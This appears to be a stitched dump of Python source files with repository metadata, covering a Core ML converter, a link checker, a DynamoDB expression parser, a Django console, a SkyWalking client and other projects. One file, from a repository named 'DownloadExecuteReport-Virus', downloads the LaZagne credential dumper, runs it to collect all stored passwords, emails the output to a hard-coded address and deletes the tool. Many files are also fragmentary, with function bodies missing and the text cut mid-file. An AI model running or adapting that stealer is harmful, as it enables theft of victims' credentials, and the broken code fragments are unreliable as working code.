# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| 38.019011 | 116 | 0.633863 |
4c1ab77adfecf5628021417f2b5bb34c29a975d3
| 17,151 |
py
|
Python
|
coremltools/converters/mil/frontend/tensorflow/converter.py
|
VadimLevin/coremltools
|
66c17b0fa040a0d8088d33590ab5c355478a9e5c
|
[
"BSD-3-Clause"
] | 3 |
2018-10-02T17:23:01.000Z
|
2020-08-15T04:47:07.000Z
|
coremltools/converters/mil/frontend/tensorflow/converter.py
|
holzschu/coremltools
|
5ece9069a1487d5083f00f56afe07832d88e3dfa
|
[
"BSD-3-Clause"
] | null | null | null |
coremltools/converters/mil/frontend/tensorflow/converter.py
|
holzschu/coremltools
|
5ece9069a1487d5083f00f56afe07832d88e3dfa
|
[
"BSD-3-Clause"
] | 1 |
2021-05-07T15:38:20.000Z
|
2021-05-07T15:38:20.000Z
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import logging
from coremltools.converters.mil.input_types import (
InputType,
TensorType,
ImageType,
RangeDim,
_get_shaping_class,
)
from coremltools.converters.mil.input_types import Shape as InputShape
from coremltools.converters.mil.mil.var import Var
from coremltools.converters.mil.mil import get_new_symbol
from coremltools.converters.mil.mil.types.symbolic import is_symbolic
from coremltools.converters.mil.mil.types import is_tensor
from coremltools.converters.mil.mil import types
from .basic_graph_ops import topsort, simple_topsort
from .convert_utils import convert_graph
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import Program
from coremltools.converters.mil.mil import Function
from .ssa_passes.tf_passes import tensorflow_passes
from coremltools.converters._profile_utils import _profile
# TranscriptionContext maintains a map of tf_node.name --> ssa_var available
# to the current TF --> tfssa transcription.
| 41.527845 | 123 | 0.58329 |
4c1b595f4c6b8f77081c78b4858260e00facf459
| 4,420 |
py
|
Python
|
pylinkcheck.py
|
clayball/pylinkcheck
|
085e5562525bebc77b8ebfd3b0fb676b01f4be68
|
[
"MIT"
] | null | null | null |
pylinkcheck.py
|
clayball/pylinkcheck
|
085e5562525bebc77b8ebfd3b0fb676b01f4be68
|
[
"MIT"
] | null | null | null |
pylinkcheck.py
|
clayball/pylinkcheck
|
085e5562525bebc77b8ebfd3b0fb676b01f4be68
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2016 Clay Wells
#
# A Python-based link checker.
#
# Usage: pylinkcheck.py -r https://www.example.com
#
# By default, we can spider and check all of the links found at the URL's
# domain. For example, a check of https://foo.example.com will only check
# links with the base URL path of foo.example.com. Link found to
# bar.example.com will not be checked.
#
# Fancy run-time options
# url root (domain): this is simply required
# generate report file: -o output.txt, --output=output.txt
# limit depth: -l 2, --limit=2
# TODO: report format: --format=txt,html,xml
##############################################################################
import argparse
import urllib2
import csv
from datetime import datetime
import re
from urlparse import urlparse
from bs4 import BeautifulSoup
#######################################
# Functions
# Spider the base URL
# Print an informative summary of the dead links
#######################################
# Main program
#
# Get command line options
parser = argparse.ArgumentParser(description='A Python-based link checker.')
parser.add_argument('-f','--format', required=False, default='txt',
help='Output file format ')
parser.add_argument('-l','--limit', required=False, default=2,
help='Limit directory depth, example.com/limit/dir/depth/')
parser.add_argument('-u','--url', help='Base URL to check', required=True)
parser.add_argument('-o','--output', help='Output file name', required=False)
args = parser.parse_args()
# Assign program arguments to variables
# - we may want to add a '/' to baseurl if it's not present.
# - if the href links are relative we need to add the baseurl when checking
# the link.
baseurl = str(args.url)
pathlimit = int(args.limit)
# Show values
print 'Base URL: %s' % args.url
print 'Output file format: %s' % args.format
print 'Output file: %s' % args.output
print 'Limit spider: %d' % args.limit
# Grab today's date for timestamping output file.
now = datetime.now()
tstamp = now.strftime("%Y%m%d-%H%M")
# Grab all a href links
checkurl = urllib2.urlopen(baseurl).read()
soup = BeautifulSoup(checkurl, 'html.parser')
# Spider the site and build our list of URLs to check
spiderURL(baseurl, pathlimit)
deadlinks = []
# This for loop will completely change once the spiderURL function is working.
# We'll iterate over the various directory paths instead.
outofscope = 0
# Check the URLs
for link in soup("a"):
# Fetch the link but only return the status code
# hrefs are unpredicatable we can add a function to 'clean' them up, i.e.,
# get the proto, domain, path, file (TODO: for a complete solution we
# need to get all of this)
#if baseurl[:-1] == '/':
# print '[debug] strip last char from baseurl'
# mailto: is causing an error
href = link.get('href')
print '[debug] href: %s' % href
if re.match('^mailto', href):
# skip this one
continue
# Separate the file from the path
thisurl = urlparse(href)
if thisurl.netloc != baseurl and thisurl.netloc != '':
print '[-] HREF %s is out of scope' % thisurl.netloc
outofscope = 1
else:
print '[debug] path %s' % thisurl.path
outofscope = 0
# Build the full URL if the href is relative.
# - assuming, for now, other protocols are not desired
# - place this in the Spider function
try:
if re.match('^http', href):
checkurl = href
else:
checkurl = baseurl + href
except:
print '[-] Unknown error in re.match()'
try:
#print '[+] checking %s' % checkurl
hrefpage = urllib2.urlopen(checkurl)
except urllib2.HTTPError as e:
if e.code == 404:
print '[-] 404 ERROR: %s' % checkurl
# add this URL to deadlink list
deadlinks.append(checkurl)
else:
print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl)
except urllib2.URLError as e:
# Not an HTTP-specific error (e.g. connection refused)
print '[-] NON-HTTP ERROR: %d - %s' % (e.code, checkurl)
else:
print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl)
printReport(deadlinks)
# EOF
| 29.466667 | 78 | 0.671946 |
4c1d42a55dc8480f71e72b9866ed7b027a303687
| 34,975 |
py
|
Python
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 1 |
2021-12-12T04:23:06.000Z
|
2021-12-12T04:23:06.000Z
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 17 |
2020-08-28T12:53:56.000Z
|
2020-11-10T01:04:46.000Z
|
moto/dynamodb2/parsing/expressions.py
|
orenmazor/moto
|
4778377e8ecaf729d26602a2c5202b72c1438503
|
[
"Apache-2.0"
] | 1 |
2021-07-06T22:44:47.000Z
|
2021-07-06T22:44:47.000Z
|
import logging
from abc import abstractmethod
import abc
import six
from collections import deque
from moto.dynamodb2.parsing.ast_nodes import (
UpdateExpression,
UpdateExpressionSetClause,
UpdateExpressionSetActions,
UpdateExpressionSetAction,
UpdateExpressionRemoveActions,
UpdateExpressionRemoveAction,
UpdateExpressionPath,
UpdateExpressionValue,
UpdateExpressionGroupedValue,
UpdateExpressionRemoveClause,
ExpressionPathDescender,
ExpressionSelector,
ExpressionAttribute,
ExpressionAttributeName,
ExpressionAttributeValue,
ExpressionValueOperator,
UpdateExpressionFunction,
UpdateExpressionAddClause,
UpdateExpressionAddActions,
UpdateExpressionAddAction,
UpdateExpressionDeleteAction,
UpdateExpressionDeleteActions,
UpdateExpressionDeleteClause,
)
from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression
from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer
class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin):
"""
Parser to create update expressions
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
def _parse(self):
"""
Update Expression is the top-most node therefore it is expected to end up at the end of the expression.
"""
while True:
self.skip_white_space()
if self.is_at_end():
logging.debug("End reached")
break
elif self._parse_by_a_subfactory():
continue
else:
self.raise_unexpected_token()
return self._create_node()
class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
class UpdateExpressionAttributeValueParser(ExpressionParser):
| 33.597502 | 120 | 0.651237 |
4c1e3b72b32866f599c7e926ceb63efd29d9c600
| 5,332 |
py
|
Python
|
dftbplus_step/tk_optimization.py
|
molssi-seamm/dftbplus_step
|
e5b9c7462d92c25fc6f27db5e4324b05bb42e224
|
[
"BSD-3-Clause"
] | 1 |
2022-01-24T05:14:03.000Z
|
2022-01-24T05:14:03.000Z
|
dftbplus_step/tk_optimization.py
|
molssi-seamm/dftbplus_step
|
e5b9c7462d92c25fc6f27db5e4324b05bb42e224
|
[
"BSD-3-Clause"
] | 10 |
2020-12-16T21:36:37.000Z
|
2022-03-17T01:53:54.000Z
|
dftbplus_step/tk_optimization.py
|
molssi-seamm/dftbplus_step
|
e5b9c7462d92c25fc6f27db5e4324b05bb42e224
|
[
"BSD-3-Clause"
] | 1 |
2022-01-14T15:26:49.000Z
|
2022-01-14T15:26:49.000Z
|
# -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
| 32.120482 | 100 | 0.515941 |
4c1e5197c84f6ae0e879e45cf958dcfad6b26bdf
| 7,000 |
py
|
Python
|
console.py
|
aplneto/redes_projeto
|
450ef8ac61e46bc38ff34142d07eda3d726ce326
|
[
"MIT"
] | 1 |
2019-04-04T13:10:01.000Z
|
2019-04-04T13:10:01.000Z
|
console.py
|
aplneto/redes_projeto
|
450ef8ac61e46bc38ff34142d07eda3d726ce326
|
[
"MIT"
] | null | null | null |
console.py
|
aplneto/redes_projeto
|
450ef8ac61e46bc38ff34142d07eda3d726ce326
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Mdulo de configurao dos consoles
"""
from Crypto.PublicKey import RSA
import socket
import os
import base64
| 32.110092 | 80 | 0.532143 |
4c1e5c9719ab7645023165c5beb655aadf6e00c7
| 4,988 |
py
|
Python
|
sandbox/settings.py
|
OmenApps/marion
|
f501674cafbd91f0bbad7454e4dcf3527cf4445e
|
[
"MIT"
] | null | null | null |
sandbox/settings.py
|
OmenApps/marion
|
f501674cafbd91f0bbad7454e4dcf3527cf4445e
|
[
"MIT"
] | null | null | null |
sandbox/settings.py
|
OmenApps/marion
|
f501674cafbd91f0bbad7454e4dcf3527cf4445e
|
[
"MIT"
] | null | null | null |
"""
Django settings for marion project.
"""
from pathlib import Path
from tempfile import mkdtemp
from configurations import Configuration, values
BASE_DIR = Path(__file__).parent.resolve()
DATA_DIR = Path("/data")
# pylint: disable=no-init
| 30.230303 | 88 | 0.635525 |
4c1fe311f29bf7609a66d633ca361b9c555f8538
| 3,512 |
py
|
Python
|
skywalking/client/grpc.py
|
cooolr/skywalking-python
|
42176ff4b732000f2a75eac1affee2a681379df7
|
[
"Apache-2.0"
] | null | null | null |
skywalking/client/grpc.py
|
cooolr/skywalking-python
|
42176ff4b732000f2a75eac1affee2a681379df7
|
[
"Apache-2.0"
] | null | null | null |
skywalking/client/grpc.py
|
cooolr/skywalking-python
|
42176ff4b732000f2a75eac1affee2a681379df7
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
| 39.909091 | 110 | 0.768508 |
4c215b75166895f7437c7eb221fac00ff09ebb82
| 2,032 |
py
|
Python
|
coingate/migrations/0004_auto_20200207_1959.py
|
glitzybunny/coingate_sandbox_payment
|
f5686964cdd6b7d65f9f37957da4b2cda6a02f63
|
[
"MIT"
] | 2 |
2020-08-31T17:53:06.000Z
|
2020-08-31T18:33:05.000Z
|
coingate/migrations/0004_auto_20200207_1959.py
|
glitzybunny/coingate_sandbox_payment
|
f5686964cdd6b7d65f9f37957da4b2cda6a02f63
|
[
"MIT"
] | 5 |
2021-03-30T12:48:17.000Z
|
2021-09-22T18:32:14.000Z
|
coingate/migrations/0004_auto_20200207_1959.py
|
glitzybunny/coingate_sandbox_payment
|
f5686964cdd6b7d65f9f37957da4b2cda6a02f63
|
[
"MIT"
] | 1 |
2020-11-04T04:42:58.000Z
|
2020-11-04T04:42:58.000Z
|
# Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
| 38.339623 | 326 | 0.561024 |
4c219c1f42bd3a942209df9b52e42549c3b34e00
| 309 |
py
|
Python
|
space_trace/__init__.py
|
SpaceTeam/space-event-trace
|
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
|
[
"MIT"
] | 2 |
2022-01-04T00:34:27.000Z
|
2022-01-04T00:51:14.000Z
|
space_trace/__init__.py
|
SpaceTeam/space-event-trace
|
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
|
[
"MIT"
] | null | null | null |
space_trace/__init__.py
|
SpaceTeam/space-event-trace
|
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
|
[
"MIT"
] | null | null | null |
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)
from space_trace import views, cli
| 18.176471 | 52 | 0.789644 |
4c228e2ac32c2ad15f711401f0894056b88a3776
| 1,388 |
py
|
Python
|
ng/distributions/Distribution.py
|
forons/noise-generator
|
033906165adaf6e620c03bf0b91f19b6d9890cf0
|
[
"MIT"
] | null | null | null |
ng/distributions/Distribution.py
|
forons/noise-generator
|
033906165adaf6e620c03bf0b91f19b6d9890cf0
|
[
"MIT"
] | null | null | null |
ng/distributions/Distribution.py
|
forons/noise-generator
|
033906165adaf6e620c03bf0b91f19b6d9890cf0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from enum import Enum
from .NormalDist import NormalDist
from .UniformDist import UniformDist
| 42.060606 | 92 | 0.659942 |
4c22a7a412610e81fee1ef9b39c31356e4fa70c7
| 258 |
py
|
Python
|
test/rename.py
|
Riteme/test
|
b511d6616a25f4ae8c3861e2029789b8ee4dcb8d
|
[
"BSD-Source-Code"
] | 3 |
2018-08-30T09:43:20.000Z
|
2019-12-03T04:53:43.000Z
|
test/rename.py
|
Riteme/test
|
b511d6616a25f4ae8c3861e2029789b8ee4dcb8d
|
[
"BSD-Source-Code"
] | null | null | null |
test/rename.py
|
Riteme/test
|
b511d6616a25f4ae8c3861e2029789b8ee4dcb8d
|
[
"BSD-Source-Code"
] | null | null | null |
import os
import sys
filename = sys.argv[1]
from_id = int(sys.argv[2])
to_id = int(sys.argv[2])
for i in range(from_id, to_id + 1):
sys.system("mv {0}.in{1} {0}{1}.in".format(filename, i))
sys.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
| 23.454545 | 62 | 0.624031 |
4c237eab0c099d5c3321cd95e513399431effe30
| 668 |
py
|
Python
|
TransitPass/urls.py
|
Savior-19/Savior19
|
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
|
[
"MIT"
] | null | null | null |
TransitPass/urls.py
|
Savior-19/Savior19
|
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
|
[
"MIT"
] | null | null | null |
TransitPass/urls.py
|
Savior-19/Savior19
|
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
|
[
"MIT"
] | 4 |
2020-05-27T10:02:31.000Z
|
2021-07-11T08:14:20.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
]
| 39.294118 | 117 | 0.754491 |
4c23f93517014abc612473feea3755466fd55cec
| 683 |
py
|
Python
|
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py
|
kozo2/dash-docs
|
5140cfd1fda439233e8b95e2443332a32a2453f5
|
[
"MIT"
] | 1 |
2021-04-11T03:08:43.000Z
|
2021-04-11T03:08:43.000Z
|
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py
|
kozo2/dash-docs
|
5140cfd1fda439233e8b95e2443332a32a2453f5
|
[
"MIT"
] | null | null | null |
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py
|
kozo2/dash-docs
|
5140cfd1fda439233e8b95e2443332a32a2453f5
|
[
"MIT"
] | null | null | null |
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
if __name__ == '__main__':
app.run_server(debug=True)
| 26.269231 | 76 | 0.682284 |
4c2449756d626addb11627279707eb2913ce92ba
| 490 |
py
|
Python
|
tests/test_wrapped_driver.py
|
balexander85/wrapped_driver
|
2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1
|
[
"MIT"
] | null | null | null |
tests/test_wrapped_driver.py
|
balexander85/wrapped_driver
|
2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1
|
[
"MIT"
] | null | null | null |
tests/test_wrapped_driver.py
|
balexander85/wrapped_driver
|
2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1
|
[
"MIT"
] | null | null | null |
import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| 28.823529 | 64 | 0.763265 |
4c244af15987164d1a6b58af8468dc053923ce6d
| 470 |
py
|
Python
|
eth/vm/forks/petersburg/blocks.py
|
ggs134/py-evm
|
5ad87356181b03c14a2452131f50fe8762127c84
|
[
"MIT"
] | 1,641 |
2017-11-24T04:24:22.000Z
|
2022-03-31T14:59:30.000Z
|
eth/vm/forks/petersburg/blocks.py
|
ggs134/py-evm
|
5ad87356181b03c14a2452131f50fe8762127c84
|
[
"MIT"
] | 1,347 |
2017-11-23T10:37:36.000Z
|
2022-03-20T16:31:44.000Z
|
eth/vm/forks/petersburg/blocks.py
|
ggs134/py-evm
|
5ad87356181b03c14a2452131f50fe8762127c84
|
[
"MIT"
] | 567 |
2017-11-22T18:03:27.000Z
|
2022-03-28T17:49:08.000Z
|
from rlp.sedes import (
CountableList,
)
from eth.rlp.headers import (
BlockHeader,
)
from eth.vm.forks.byzantium.blocks import (
ByzantiumBlock,
)
from .transactions import (
PetersburgTransaction,
)
| 20.434783 | 61 | 0.697872 |
4c249535bfee369b506769f07912c622ac79fe51
| 5,107 |
py
|
Python
|
tests/runner.py
|
crnbaker/MONAI
|
a4b1144efdc27b197410033ae08bd587c8a1634a
|
[
"Apache-2.0"
] | 1 |
2020-12-03T21:28:09.000Z
|
2020-12-03T21:28:09.000Z
|
tests/runner.py
|
crnbaker/MONAI
|
a4b1144efdc27b197410033ae08bd587c8a1634a
|
[
"Apache-2.0"
] | null | null | null |
tests/runner.py
|
crnbaker/MONAI
|
a4b1144efdc27b197410033ae08bd587c8a1634a
|
[
"Apache-2.0"
] | 1 |
2020-06-11T13:03:02.000Z
|
2020-06-11T13:03:02.000Z
|
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import inspect
import os
import sys
import time
import unittest
from monai.utils import PerfContext
results: dict = dict()
if __name__ == "__main__":
loader = unittest.TestLoader()
default_pattern = get_default_pattern(loader)
# Parse input arguments
args = parse_args(default_pattern)
# If quick is desired, set environment variable
if args.quick:
os.environ["QUICKTEST"] = "True"
# Get all test names (optionally from some path with some pattern)
with PerfContext() as pc:
tests = loader.discover(args.path, args.pattern)
discovery_time = pc.total_time
print(f"time to discover tests: {discovery_time}s")
test_runner = unittest.runner.TextTestRunner(
resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast
)
# Use try catches to print the current results if encountering exception or keyboard interruption
try:
test_result = test_runner.run(tests)
print_results(results, discovery_time, args.thresh, "tests finished")
sys.exit(not test_result.wasSuccessful())
except KeyboardInterrupt:
print_results(results, discovery_time, args.thresh, "tests cancelled")
sys.exit(1)
except Exception:
print_results(results, discovery_time, args.thresh, "exception reached")
raise
| 35.22069 | 118 | 0.662033 |
4c25af4aec5e8d2b72efcbe5e7b1a661e7cc9946
| 963 |
py
|
Python
|
venv/Lib/site-packages/pandas/core/array_algos/transforms.py
|
arnoyu-hub/COMP0016miemie
|
59af664dcf190eab4f93cefb8471908717415fea
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/core/array_algos/transforms.py
|
arnoyu-hub/COMP0016miemie
|
59af664dcf190eab4f93cefb8471908717415fea
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/core/array_algos/transforms.py
|
arnoyu-hub/COMP0016miemie
|
59af664dcf190eab4f93cefb8471908717415fea
|
[
"MIT"
] | null | null | null |
"""
transforms.py is for shape-preserving functions.
"""
import numpy as np
| 24.692308 | 82 | 0.599169 |
4c2609dfb8072ffe05951ef05454ba700de01952
| 789 |
py
|
Python
|
students/models/group.py
|
Stanislav-Rybonka/studentsdb
|
efb1440db4ec640868342a5f74cd48784268781f
|
[
"MIT"
] | 1 |
2020-03-02T20:55:04.000Z
|
2020-03-02T20:55:04.000Z
|
students/models/group.py
|
Stanislav-Rybonka/studentsdb
|
efb1440db4ec640868342a5f74cd48784268781f
|
[
"MIT"
] | 6 |
2020-06-05T17:18:41.000Z
|
2022-03-11T23:14:47.000Z
|
students/models/group.py
|
Stanislav-Rybonka/studentsdb
|
efb1440db4ec640868342a5f74cd48784268781f
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
| 29.222222 | 94 | 0.64512 |
4c263e5689af5df6e8fbc9a6cee80e41efe505e2
| 2,319 |
py
|
Python
|
frontegg/baseConfig/identity_mixin.py
|
pinikeizman/python-sdk
|
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
|
[
"MIT"
] | null | null | null |
frontegg/baseConfig/identity_mixin.py
|
pinikeizman/python-sdk
|
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
|
[
"MIT"
] | null | null | null |
frontegg/baseConfig/identity_mixin.py
|
pinikeizman/python-sdk
|
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
| 32.661972 | 108 | 0.639069 |
4c26b67f1983ed6d013acb44413f671a2be21260
| 7,534 |
py
|
Python
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 12 |
2019-08-01T06:16:17.000Z
|
2021-04-16T20:00:02.000Z
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 5 |
2020-09-27T12:03:24.000Z
|
2021-08-06T18:01:32.000Z
|
splunk_sdk/action/v1beta2/gen_action_service_api.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 4 |
2019-08-20T17:49:27.000Z
|
2022-03-27T16:39:10.000Z
|
# coding: utf-8
# Copyright 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Action Service
With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.
OpenAPI spec version: v1beta2.12 (recommended default)
Generated by: https://openapi-generator.tech
"""
from requests import Response
from string import Template
from typing import List, Dict
from splunk_sdk.base_client import handle_response
from splunk_sdk.base_service import BaseService
from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel
from splunk_sdk.action.v1beta2.gen_models import Action
from splunk_sdk.action.v1beta2.gen_models import ActionMutable
from splunk_sdk.action.v1beta2.gen_models import ActionResult
from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail
from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey
from splunk_sdk.action.v1beta2.gen_models import ServiceError
from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
| 37.1133 | 177 | 0.668835 |
4c26e9b14a57dad62c0722a56d9cd088844722fb
| 97 |
py
|
Python
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3 |
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23 |
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/home/__init__.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import Blueprint
home_bp = Blueprint('home', __name__)
from . import views # noqa
| 13.857143 | 37 | 0.731959 |
4c2897e16dece2ba4ecd2dbef042a4f90f011294
| 786 |
py
|
Python
|
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
main.py
|
TheRavehorn/DownloadExecuteReport-Virus
|
9df26706e504d1df33e07c09fa56baa28d89f435
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("[email protected]", "yourpassword", result)
os.remove("lazagne.exe")
| 24.5625 | 97 | 0.720102 |
4c2951c766fe0cde976ee8004540518c1924599a
| 113 |
py
|
Python
|
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
SmartAPI/rdf/LinkedList.py
|
Kreastr/SmartAPI-HEILA
|
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
|
[
"BSD-2-Clause"
] | null | null | null |
from SmartAPI.rdf.List import List
| 16.142857 | 34 | 0.699115 |
4c2a0b02facefb7ade979ad8ea41989718dd6e87
| 13,974 |
py
|
Python
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 3 |
2021-10-03T23:11:24.000Z
|
2021-10-04T12:14:56.000Z
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 7 |
2019-10-15T20:51:36.000Z
|
2020-02-27T18:25:26.000Z
|
frog/views/gallery.py
|
dreamhaven/Frog
|
66e50610d5059aa371e0a50b65ceddd4813b2bc1
|
[
"MIT"
] | 1 |
2020-09-30T11:23:55.000Z
|
2020-09-30T11:23:55.000Z
|
##################################################################################################
# Copyright (c) 2012 Brett Dixon
#
